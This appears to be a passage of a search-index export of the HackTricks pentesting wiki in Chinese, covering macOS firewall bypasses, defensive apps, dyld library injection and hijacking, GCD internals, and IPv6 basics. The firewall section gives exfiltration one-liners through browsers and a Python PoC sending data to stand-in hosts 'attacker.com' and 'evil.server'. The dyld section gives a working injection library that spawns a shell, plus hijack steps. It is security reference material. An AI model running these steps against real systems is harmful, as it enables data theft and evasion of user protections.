检查这一点)。 firmlinks 的列表可以在 /usr/share/firmlinks 文件中找到。 bash tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS AppleFS » Firmlinks","id":"2121","title":"Firmlinks"},"2122":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » macOS 绕过防火墙","id":"2122","title":"macOS 绕过防火墙"},"2123":{"body":"以下技术在某些 macOS 防火墙应用中有效。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 发现的技术","id":"2123","title":"发现的技术"},"2124":{"body":"例如,使用 launchd 等知名 macOS 进程的名称调用恶意软件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 滥用白名单名称","id":"2124","title":"滥用白名单名称"},"2125":{"body":"如果防火墙要求用户授权,让恶意软件 点击允许 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 合成点击","id":"2125","title":"合成点击"},"2126":{"body":"像 curl ,还有其他如 whois 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 使用 Apple 签名的二进制文件","id":"2126","title":"使用 Apple 签名的二进制文件"},"2127":{"body":"防火墙可能允许连接到知名的苹果域名,如 apple.com 或 icloud.com 。iCloud 可以用作 C2。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 知名的苹果域名","id":"2127","title":"知名的苹果域名"},"2128":{"body":"一些尝试绕过防火墙的想法。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 通用绕过","id":"2128","title":"通用绕过"},"2129":{"body":"了解允许的流量将帮助您识别潜在的白名单域名或哪些应用程序被允许访问它们。 bash lsof -i TCP -sTCP:ESTABLISHED","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 检查允许的流量","id":"2129","title":"检查允许的流量"},"213":{"body":"唯一本地地址 (ULA) :用于本地通信,不用于公共互联网路由。前缀: FEC00::/7 组播地址 
:用于一对多通信。发送到组播组中的所有接口。前缀: FF00::/8 任播地址 :用于一对最近的通信。根据路由协议发送到最近的接口。属于 2000::/3 全球单播范围。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » IPv6 地址类型","id":"213","title":"IPv6 地址类型"},"2130":{"body":"DNS 解析是通过 mdnsreponder 签名应用程序完成的,该应用程序可能被允许联系 DNS 服务器。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 滥用 DNS","id":"2130","title":"滥用 DNS"},"2131":{"body":"oascript applescript tell application \\"Safari\\"\\nrun\\ntell application \\"Finder\\" to set visible of process \\"Safari\\" to false\\nmake new document\\nset the URL of document 1 to \\"https://attacker.com?data=data%20to%20exfil\\nend tell 谷歌浏览器 bash \\"Google Chrome\\" --crash-dumps-dir=/tmp --headless \\"https://attacker.com?data=data%20to%20exfil\\" 火狐 bash firefox-bin --headless \\"https://attacker.com?data=data%20to%20exfil\\" Safari bash open -j -a Safari \\"https://attacker.com?data=data%20to%20exfil\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 通过浏览器应用","id":"2131","title":"通过浏览器应用"},"2132":{"body":"如果你可以 将代码注入到一个可以连接到任何服务器的进程中 ,你就可以绕过防火墙保护: macOS Process Abuse","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 通过进程注入","id":"2132","title":"通过进程注入"},"2133":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 最近的 macOS 防火墙绕过漏洞 (2023-2025)","id":"2133","title":"最近的 macOS 防火墙绕过漏洞 (2023-2025)"},"2134":{"body":"在2024年7月,苹果修复了Safari/WebKit中的一个关键漏洞,该漏洞破坏了屏幕时间家长控制使用的系统范围内的“网络内容过滤器”。 一个特别构造的URI(例如,带有双重URL编码的“://”)未被屏幕时间ACL识别,但被WebKit接受,因此请求未经过滤地发送出去。任何可以打开URL的进程(包括沙盒或未签名的代码)因此可以访问用户或MDM配置文件明确阻止的域。 实际测试(未修补的系统): bash open \\"http://attacker%2Ecom%2F./\\" # should be blocked by Screen Time\\n# if the patch is missing Safari will happily load the page","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 网络内容过滤器(屏幕时间)绕过 – CVE-2024-44206","id":"2134","title":"网络内容过滤器(屏幕时间)绕过 – CVE-2024-44206"},"2135":{"body":"在 macOS 14 测试版周期中,Apple 在 
pfctl 的用户空间包装中引入了一个回归。 使用 quick 关键字添加的规则(许多 VPN 杀开关使用)被静默忽略,即使 VPN/防火墙 GUI 报告 已阻止 ,也会导致流量泄漏。该漏洞已被多个 VPN 供应商确认,并在 RC 2(构建 23A344)中修复。 快速泄漏检查: bash pfctl -sr | grep quick # rules are present…\\nsudo tcpdump -n -i en0 not port 53 # …but packets still leave the interface","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » Packet Filter (PF) 规则排序漏洞在早期 macOS 14 “Sonoma”","id":"2135","title":"Packet Filter (PF) 规则排序漏洞在早期 macOS 14 “Sonoma”"},"2136":{"body":"在 macOS 11.2 之前, ContentFilterExclusionList 允许大约 50 个苹果二进制文件,如 nsurlsessiond 和 App Store,绕过所有使用网络扩展框架(LuLu、Little Snitch 等)实现的套接字过滤防火墙。 恶意软件可以简单地生成一个被排除的进程——或向其中注入代码——并通过已经允许的套接字隧道其自己的流量。苹果在 macOS 11.2 中完全移除了排除列表,但该技术在无法升级的系统上仍然相关。 示例概念验证(11.2 之前): python import subprocess, socket\\n# Launch excluded App Store helper (path collapsed for clarity)\\nsubprocess.Popen([\'/System/Applications/App\\\\\\\\ Store.app/Contents/MacOS/App Store\'])\\n# Connect through the inherited socket\\ns = socket.create_connection((\\"evil.server\\", 443))\\ns.send(b\\"exfil...\\")","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 滥用苹果签名的辅助服务(遗留 - macOS 11.2 之前)","id":"2136","title":"滥用苹果签名的辅助服务(遗留 - macOS 11.2 之前)"},"2137":{"body":"检查 GUI 防火墙生成的当前 PF 规则: bash sudo pfctl -a com.apple/250.ApplicationFirewall -sr 枚举已经持有 outgoing-network 权限的二进制文件(对搭便车很有用): bash codesign -d --entitlements :- /path/to/bin 2>/dev/null \\\\\\n| plutil -extract com.apple.security.network.client xml1 -o - - 以编程方式在 Objective-C/Swift 中注册您自己的网络扩展内容过滤器。 一个最小的无根 PoC,可以将数据包转发到本地套接字,已在 Patrick Wardle 的 LuLu 源代码中提供。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » Tooling tips for modern macOS","id":"2137","title":"Tooling tips for modern macOS"},"2138":{"body":"https://www.youtube.com/watch?v=UlT5KFTMn2k https://nosebeard.co/advisories/nbl-001.html https://thehackernews.com/2021/01/apple-removes-macos-feature-that.html tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team 
Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » References","id":"2138","title":"References"},"2139":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Defensive Apps » macOS Defensive Apps","id":"2139","title":"macOS Defensive Apps"},"214":{"body":"fe80::/10 :链路本地地址(类似于 169.254.x.x) fc00::/7 :唯一本地单播(类似于私有 IPv4 范围,如 10.x.x.x, 172.16.x.x, 192.168.x.x) 2000::/3 :全球单播 ff02::1 :组播所有节点 ff02::2 :组播路由器节点","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 地址前缀","id":"214","title":"地址前缀"},"2140":{"body":"Little Snitch : 它将监控每个进程所建立的每个连接。根据模式(静默允许连接、静默拒绝连接并警报),它将 在每次建立新连接时向您显示警报 。它还有一个非常好的图形用户界面来查看所有这些信息。 LuLu : Objective-See 防火墙。这是一个基本的防火墙,会对可疑连接发出警报(它有一个图形用户界面,但没有 Little Snitch 的那么花哨)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Defensive Apps » Firewalls","id":"2140","title":"Firewalls"},"2141":{"body":"KnockKnock : Objective-See 应用程序,将在多个位置搜索 恶意软件可能存在的地方 (这是一个一次性工具,而不是监控服务)。 BlockBlock : 像 KnockKnock 一样,通过监控生成持久性的进程。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Defensive Apps » Persistence detection","id":"2141","title":"Persistence detection"},"2142":{"body":"ReiKey : Objective-See 应用程序,用于查找安装键盘“事件捕获”的 键盘记录器 。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red 
Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Defensive Apps » Keyloggers detection","id":"2142","title":"Keyloggers detection"},"2143":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » Macos Dyld Hijacking And Dyld Insert Libraries » macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES","id":"2143","title":"macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES"},"2144":{"body":"要注入的库 以执行 shell: c // gcc -dynamiclib -o inject.dylib inject.c #include \\n#include \\n#include \\n#include \\n__attribute__((constructor)) void myconstructor(int argc, const char **argv)\\n{\\nsyslog(LOG_ERR, \\"[+] dylib injected in %s\\\\n\\", argv[0]);\\nprintf(\\"[+] dylib injected in %s\\\\n\\", argv[0]);\\nexecv(\\"/bin/bash\\", 0);\\n//system(\\"cp -r ~/Library/Messages/ /tmp/Messages/\\");\\n} 攻击的二进制文件: c // gcc hello.c -o hello\\n#include int main()\\n{\\nprintf(\\"Hello, World!\\\\n\\");\\nreturn 0;\\n} 注入: bash DYLD_INSERT_LIBRARIES=inject.dylib ./hello","breadcrumbs":"macOS Security & Privilege Escalation » Macos Dyld Hijacking And Dyld Insert Libraries » DYLD_INSERT_LIBRARIES 基本示例","id":"2144","title":"DYLD_INSERT_LIBRARIES 基本示例"},"2145":{"body":"目标易受攻击的二进制文件是 /Applications/VulnDyld.app/Contents/Resources/lib/binary。 entitlements\\nLC_RPATH\\n@rpath codesign -dv --entitlements :- 
\\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\"\\n[...]com.apple.security.cs.disable-library-validation[...] bash # Check where are the @rpath locations\\notool -l \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\" | grep LC_RPATH -A 2\\ncmd LC_RPATH\\ncmdsize 32\\npath @loader_path/. (offset 12)\\n--\\ncmd LC_RPATH\\ncmdsize 32\\npath @loader_path/../lib2 (offset 12) bash # Check libraries loaded using @rpath and the used versions\\notool -l \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\" | grep \\"@rpath\\" -A 3\\nname @rpath/lib.dylib (offset 24)\\ntime stamp 2 Thu Jan 1 01:00:02 1970\\ncurrent version 1.0.0\\ncompatibility version 1.0.0\\n# Check the versions 根据之前的信息,我们知道它 没有检查加载库的签名 ,并且 尝试从以下位置加载库 : /Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib /Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib 然而,第一个库并不存在: bash pwd\\n/Applications/VulnDyld.app find ./ -name lib.dylib\\n./Contents/Resources/lib2/lib.dylib 所以,可以劫持它!创建一个库, 执行一些任意代码并通过重新导出它来导出与合法库相同的功能 。并记得使用预期的版本进行编译: lib.m #import __attribute__((constructor))\\nvoid custom(int argc, const char **argv) {\\nNSLog(@\\"[+] dylib hijacked in %s\\", argv[0]);\\n} 编译它: bash gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,\\"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib\\" -o \\"/tmp/lib.dylib\\"\\n# Note the versions and the reexport 库中创建的重新导出路径是相对于加载器的,让我们将其更改为库的绝对路径以进行导出: bash #Check relative\\notool -l /tmp/lib.dylib| grep REEXPORT -A 2\\ncmd LC_REEXPORT_DYLIB\\ncmdsize 48\\nname @rpath/libjli.dylib (offset 24) #Change the location of the library from relative to absolute path\\ninstall_name_tool -change @rpath/lib.dylib \\"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib\\" /tmp/lib.dylib # Check again\\notool -l /tmp/lib.dylib| grep REEXPORT -A 2\\ncmd LC_REEXPORT_DYLIB\\ncmdsize 128\\nname /Applications/Burp Suite 
Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24) 最后将其复制到 hijacked location : bash cp lib.dylib \\"/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib\\" 并 执行 二进制文件并检查 库是否已加载 : \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\"\\n2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary\\nUsage: [...] note 关于如何利用此漏洞滥用 Telegram 的相机权限的详细说明可以在 https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/ 中找到。","breadcrumbs":"macOS Security & Privilege Escalation » Macos Dyld Hijacking And Dyld Insert Libraries » Dyld 劫持示例","id":"2145","title":"Dyld 劫持示例"},"2146":{"body":"如果您计划尝试在意外的二进制文件中注入库,您可以检查事件消息以找出库何时在进程中加载(在这种情况下,删除 printf 和 /bin/bash 执行)。 bash sudo log stream --style syslog --predicate \'eventMessage CONTAINS[c] \\"[+] dylib\\"\' tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » Macos Dyld Hijacking And Dyld Insert Libraries » 更大规模","id":"2146","title":"更大规模"},"2147":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » macOS GCD - Grand Central Dispatch","id":"2147","title":"macOS GCD - Grand Central Dispatch"},"2148":{"body":"Grand Central Dispatch (GCD) ,也称为 libdispatch (libdispatch.dyld),在 macOS 和 iOS 中均可用。它是苹果公司开发的一项技术,旨在优化应用程序对多核硬件上并发(多线程)执行的支持。 GCD 提供并管理 FIFO 队列 ,您的应用程序可以将任务以 块对象 的形式 提交 。提交到调度队列的块将在系统完全管理的线程池上 执行 。GCD 自动创建线程以执行调度队列中的任务,并安排这些任务在可用核心上运行。 tip 总之,为了 并行 执行代码,进程可以将 代码块发送到 GCD ,GCD 将负责它们的执行。因此,进程不会创建新线程; GCD 使用其自己的线程池执行给定的代码 (线程池可能根据需要增加或减少)。 这对于成功管理并行执行非常有帮助,极大地减少了进程创建的线程数量,并优化了并行执行。这对于需要 高度并行性 (暴力破解?)的任务或不应阻塞主线程的任务是理想的:例如,iOS 上的主线程处理 UI 交互,因此任何可能导致应用程序挂起的其他功能(搜索、访问网络、读取文件等)都是以这种方式管理的。","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » 基本信息","id":"2148","title":"基本信息"},"2149":{"body":"块是一个 自包含的代码段 (像一个带参数返回值的函数),也可以指定绑定变量。 然而,在编译器级别,块并不存在,它们是 os_object。每个这些对象由两个结构组成: 块字面量 : 它以 isa 字段开始,指向块的类: NSConcreteGlobalBlock(来自 __DATA.__const 的块) NSConcreteMallocBlock(堆中的块) NSConcreateStackBlock(栈中的块) 它有 flags (指示块描述符中存在的字段)和一些保留字节 调用的函数指针 指向块描述符的指针 导入的块变量(如果有) 块描述符 :其大小取决于存在的数据(如前面标志所示) 它有一些保留字节 它的大小 通常会有一个指向 Objective-C 风格签名的指针,以了解参数需要多少空间(标志 BLOCK_HAS_SIGNATURE) 如果引用了变量,则该块还将具有指向复制助手(在开始时复制值)和处置助手(释放它)的指针。","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » 块","id":"2149","title":"块"},"215":{"body":"方法 1:使用链路本地地址 获取网络中设备的 MAC 地址。 从 MAC 地址派生链路本地 IPv6 地址。 方法 2:使用组播 向组播地址 ff02::1 发送 ping,以发现本地网络上的 IPv6 地址。 bash service ufw stop # Stop the firewall\\nping6 -I ff02::1 # Send a ping to multicast address\\nip -6 neigh # Display the neighbor table","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 在网络中发现 IPv6 地址","id":"215","title":"在网络中发现 IPv6 地址"},"2150":{"body":"调度队列是一个命名对象,提供块的 FIFO 执行顺序。 块被设置在队列中以供执行,这些队列支持 2 种模式:DISPATCH_QUEUE_SERIAL 和 DISPATCH_QUEUE_CONCURRENT。当然, 串行 队列 不会有竞争条件 问题,因为块不会在前一个块完成之前执行。但 另一种类型的队列可能会有 。 默认队列: .main-thread: 来自 
dispatch_get_main_queue() .libdispatch-manager: GCD 的队列管理器 .root.libdispatch-manager: GCD 的队列管理器 .root.maintenance-qos: 最低优先级任务 .root.maintenance-qos.overcommit .root.background-qos: 可用作 DISPATCH_QUEUE_PRIORITY_BACKGROUND .root.background-qos.overcommit .root.utility-qos: 可用作 DISPATCH_QUEUE_PRIORITY_NON_INTERACTIVE .root.utility-qos.overcommit .root.default-qos: 可用作 DISPATCH_QUEUE_PRIORITY_DEFAULT .root.background-qos.overcommit .root.user-initiated-qos: 可用作 DISPATCH_QUEUE_PRIORITY_HIGH .root.background-qos.overcommit .root.user-interactive-qos: 最高优先级 .root.background-qos.overcommit 请注意,系统将决定 每个时刻哪个线程处理哪个队列 (多个线程可能在同一队列中工作,或者同一线程可能在某些时刻在不同队列中工作) 属性 使用 dispatch_queue_create 创建队列时,第三个参数是 dispatch_queue_attr_t,通常是 DISPATCH_QUEUE_SERIAL(实际上是 NULL)或 DISPATCH_QUEUE_CONCURRENT,这是指向 dispatch_queue_attr_t 结构的指针,允许控制队列的一些参数。","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » 队列","id":"2150","title":"队列"},"2151":{"body":"libdispatch 使用多个对象,队列和块只是其中的 2 个。可以使用 dispatch_object_create 创建这些对象: block data: 数据块 group: 块组 io: 异步 I/O 请求 mach: Mach 端口 mach_msg: Mach 消息 pthread_root_queue: 带有 pthread 线程池的队列,而不是工作队列 queue semaphore source: 事件源","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » 调度对象","id":"2151","title":"调度对象"},"2152":{"body":"在 Objective-C 中,有不同的函数可以将块发送以并行执行: dispatch_async : 提交一个块以在调度队列上异步执行,并立即返回。 dispatch_sync : 提交一个块对象以执行,并在该块执行完成后返回。 dispatch_once : 在应用程序的生命周期内仅执行一次块对象。 dispatch_async_and_wait : 提交一个工作项以执行,并仅在其完成执行后返回。与 dispatch_sync 不同,此函数在执行块时尊重队列的所有属性。 这些函数期望这些参数: dispatch_queue_t queue, dispatch_block_t block 这是 块的结构 : c struct Block {\\nvoid *isa; // NSConcreteStackBlock,...\\nint flags;\\nint reserved;\\nvoid *invoke;\\nstruct BlockDescriptor *descriptor;\\n// captured variables go here\\n}; 这是一个使用 parallelism 和 dispatch_async 的示例: objectivec #import // Define a block\\nvoid (^backgroundTask)(void) = ^{\\n// Code to be executed in the background\\nfor (int i = 0; i < 10; i++) 
{\\nNSLog(@\\"Background task %d\\", i);\\nsleep(1); // Simulate a long-running task\\n}\\n}; int main(int argc, const char * argv[]) {\\n@autoreleasepool {\\n// Create a dispatch queue\\ndispatch_queue_t backgroundQueue = dispatch_queue_create(\\"com.example.backgroundQueue\\", NULL); // Submit the block to the queue for asynchronous execution\\ndispatch_async(backgroundQueue, backgroundTask); // Continue with other work on the main queue or thread\\nfor (int i = 0; i < 10; i++) {\\nNSLog(@\\"Main task %d\\", i);\\nsleep(1); // Simulate a long-running task\\n}\\n}\\nreturn 0;\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » Objective-C","id":"2152","title":"Objective-C"},"2153":{"body":"libswiftDispatch 是一个库,提供 Swift 绑定 到 Grand Central Dispatch (GCD) 框架,该框架最初是用 C 编写的。 libswiftDispatch 库将 C GCD API 封装在一个更适合 Swift 的接口中,使 Swift 开发者更容易和直观地使用 GCD。 DispatchQueue.global().sync{ ... } DispatchQueue.global().async{ ... } let onceToken = DispatchOnce(); onceToken.perform { ... 
} async await var (data, response) = await URLSession.shared.data(from: URL(string: \\"https://api.example.com/getData\\")) 代码示例 : swift import Foundation // Define a closure (the Swift equivalent of a block)\\nlet backgroundTask: () -> Void = {\\nfor i in 0..<10 {\\nprint(\\"Background task \\\\(i)\\")\\nsleep(1) // Simulate a long-running task\\n}\\n} // Entry point\\nautoreleasepool {\\n// Create a dispatch queue\\nlet backgroundQueue = DispatchQueue(label: \\"com.example.backgroundQueue\\") // Submit the closure to the queue for asynchronous execution\\nbackgroundQueue.async(execute: backgroundTask) // Continue with other work on the main queue\\nfor i in 0..<10 {\\nprint(\\"Main task \\\\(i)\\")\\nsleep(1) // Simulate a long-running task\\n}\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » Swift","id":"2153","title":"Swift"},"2154":{"body":"以下 Frida 脚本可用于 hook 进入多个 dispatch 函数并提取队列名称、回溯和块: https://github.com/seemoo-lab/frida-scripts/blob/main/scripts/libdispatch.js bash frida -U -l libdispatch.js dispatch_sync\\nCalling queue: com.apple.UIKit._UIReusePool.reuseSetAccess\\nCallback function: 0x19e3a6488 UIKitCore!__26-[_UIReusePool addObject:]_block_invoke\\nBacktrace:\\n0x19e3a6460 UIKitCore!-[_UIReusePool addObject:]\\n0x19e3a5db8 UIKitCore!-[UIGraphicsRenderer _enqueueContextForReuse:]\\n0x19e3a57fc UIKitCore!+[UIGraphicsRenderer _destroyCGContext:withRenderer:]\\n[...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » Frida","id":"2154","title":"Frida"},"2155":{"body":"目前 Ghidra 既不理解 ObjectiveC dispatch_block_t 结构,也不理解 swift_dispatch_block 结构。 所以如果你想让它理解这些结构,你可以 声明它们 : 然后,在代码中找到它们 被使用 的地方: tip 注意所有提到“block”的引用,以了解你如何能够判断该结构正在被使用。 右键单击变量 -> 重新定义变量,并在这种情况下选择 swift_dispatch_block : Ghidra 将自动重写所有内容:","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » Ghidra","id":"2155","title":"Ghidra"},"2156":{"body":"*OS Internals, Volume I: 
User Mode. By Jonathan Levin tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » References","id":"2156","title":"References"},"2157":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS 内核与系统扩展","id":"2157","title":"macOS 内核与系统扩展"},"2158":{"body":"macOS 的 核心是 XNU ,代表“X is Not Unix”。这个内核基本上由 Mach 微内核 (稍后讨论)和来自伯克利软件分发( BSD )的元素组成。XNU 还通过一个名为 I/O Kit 的系统提供 内核驱动程序的平台 。XNU 内核是 Darwin 开源项目的一部分,这意味着 其源代码是公开可获取的 。 从安全研究人员或 Unix 开发者的角度来看, macOS 感觉与 FreeBSD 系统非常 相似 ,具有优雅的 GUI 和一系列自定义应用程序。大多数为 BSD 开发的应用程序可以在 macOS 上编译和运行,而无需修改,因为熟悉 Unix 用户的命令行工具在 macOS 中都存在。然而,由于 XNU 内核结合了 Mach,传统 Unix 类系统与 macOS 之间存在一些显著差异,这些差异可能导致潜在问题或提供独特优势。 XNU 的开源版本: https://opensource.apple.com/source/xnu/","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » XNU 内核","id":"2158","title":"XNU 内核"},"2159":{"body":"Mach 是一个 微内核 ,旨在 与 UNIX 兼容 。其一个关键设计原则是 最小化 在 内核 空间中运行的 代码 ,而允许许多典型的内核功能,如文件系统、网络和 I/O,作为 用户级任务 运行。 在 XNU 中,Mach 负责内核通常处理的许多关键低级操作,如处理器调度、多任务处理和虚拟内存管理。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » Mach","id":"2159","title":"Mach"},"216":{"body":"在IPv6网络中执行MitM攻击的几种技术包括: 冒充ICMPv6邻居或路由器广告。 
